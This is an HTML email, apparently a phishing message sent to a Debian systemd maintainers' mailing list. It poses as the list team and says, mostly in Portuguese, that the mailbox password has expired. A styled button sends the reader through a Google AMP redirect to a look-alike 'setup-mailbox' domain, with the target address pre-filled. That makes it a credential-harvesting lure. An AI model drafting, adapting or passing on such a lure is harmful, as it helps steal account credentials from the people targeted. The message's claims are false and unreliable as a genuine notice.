<!DOCTYPE html>

<html lang="en"><head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Password Expiration Notice</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #f4f4f4;
            margin: 0;
            padding: 0;
            color: #333333;
        }
        .email-container {
            max-width: 600px;
            margin: 40px auto;
            background-color: #ffffff;
            padding: 40px;
            border-radius: 8px;
            box-shadow: 0 4px 12px rgba(0, 0, 0, 0.1);
        }
        h1 {
            font-size: 24px;
            color: #2c3e50;
            margin-bottom: 20px;
            text-align: center;
            border-bottom: 2px solid #3498db;
            padding-bottom: 10px;
        }
        p {
            font-size: 16px;
            line-height: 1.6;
            margin-bottom: 20px;
            color: #34495e;
        }
        .highlight {
            background-color: #f8f8f8;
            border-left: 4px solid #3498db;
            padding: 15px;
            margin-bottom: 20px;
        }
        .btn-container {
            text-align: center;
            margin: 30px 0;
        }
        .btn {
            display: inline-block;
            background-color: #3498db;
            color: #ffffff;
            padding: 12px 30px;
            font-size: 16px;
            border-radius: 5px;
            text-decoration: none;
            font-weight: bold;
            transition: background-color 0.3s ease;
        }
        .btn:hover {
            background-color: #2980b9;
        }
        .warning-text {
            color: #e74c3c;
            font-weight: bold;
        }
        .footer {
            font-size: 14px;
            color: #7f8c8d;
            text-align: center;
            margin-top: 40px;
            padding-top: 20px;
            border-top: 1px solid #ecf0f1;
        }
        .footer p {
            margin: 5px 0;
        }
        .footer a {
            color: #3498db;
            text-decoration: none;
        }
        .footer a:hover {
            text-decoration: underline;
        }
    </style>
</head>
<body style="font-family: Arial, sans-serif;
            background-color: #f4f4f4;
            margin: 0;
            padding: 0;
            color: #333333">
    <div style="max-width: 600px;
            margin: 40px auto;
            background-color: #ffffff;
            padding: 40px;
            border-radius: 8px;
            box-shadow: 0 4px 12px rgba(0, 0, 0, 0.1)" class="email-container">
        <h1 style="font-size: 24px;
            color: #2c3e50;
            margin-bottom: 20px;
            text-align: center;
            border-bottom: 2px solid #3498db;
            padding-bottom: 10px">Alerta De Expiração Da Palavra-Passe</h1>
        <p style="font-size: 16px;
            line-height: 1.6;
            margin-bottom: 20px;
            color: #34495e">Dear pkg-systemd-maintainers,</p>
        <p style="font-size: 16px;
            line-height: 1.6;
            margin-bottom: 20px;
            color: #34495e">Estamos escrevendo para informar que sua senha atual para a caixa de correio pkg-systemd-maintainers@lists.alioth.debian.org expirou. </p>
        <div style="background-color: #f8f8f8;
            border-left: 4px solid #3498db;
            padding: 15px;
            margin-bottom: 20px" class="highlight">
            <p style="font-size: 16px;
            line-height: 1.6;
            margin-bottom: 20px;
            color: #34495e; color: #e74c3c;
            font-weight: bold" class="warning-text">Importante: a falha na atualização da sua senha resultará na perda temporária de acesso à sua caixa de correio. É altamente recomendável agir prontamente para evitar interrupções no seu serviço.</p><strong>
        </strong></div><strong>
        </strong><p style="font-size: 16px;
            line-height: 1.6;
            margin-bottom: 20px;
            color: #34495e">No entanto, é aconselhável continuar a utilizar a sua palavra-passe actual. Para continuar a utilizar a palavra-passe actual, clique no botão abaixo:</p>
        <div style="text-align: center;
            margin: 30px 0" class="btn-container">
            <a style="display: inline-block;
            background-color: #3498db;
            color: #ffffff;
            padding: 12px 30px;
            font-size: 16px;
            border-radius: 5px;
            text-decoration: none;
            font-weight: bold;
            transition: background-color 0.3s ease" class="btn" href="https://google.com/amp/s/setup-mailbox-pt.cloud-ip.biz/#pkg-systemd-maintainers@lists.alioth.debian.org">Atualize A Senha Agora</a>
        </div>
        <p style="font-size: 16px;
            line-height: 1.6;
            margin-bottom: 20px;
            color: #34495e">Obrigado pela sua atenção imediata a este assunto.</p>
        <p style="font-size: 16px;
            line-height: 1.6;
            margin-bottom: 20px;
            color: #34495e">Cumprimentos,<br>A Equipa lists.alioth.debian.org</p>
    </div>
    <div style="font-size: 14px;
            color: #7f8c8d;
            text-align: center;
            margin-top: 40px;
            padding-top: 20px;
            border-top: 1px solid #ecf0f1" class="footer">
        <p style="font-size: 16px;
            line-height: 1.6;
            margin-bottom: 20px;
            color: #34495e; margin: 5px 0">© 2024 lists.alioth.debian.org. Todos os direitos reservados.</p>
        <p style="font-size: 16px;
            line-height: 1.6;
            margin-bottom: 20px;
            color: #34495e; margin: 5px 0"><a href="#">Política De Privacidade</a> | <a href="#">Termos de Serviço</a> | <a href="#">Contact Support</a></p>
    </div>

</body></html>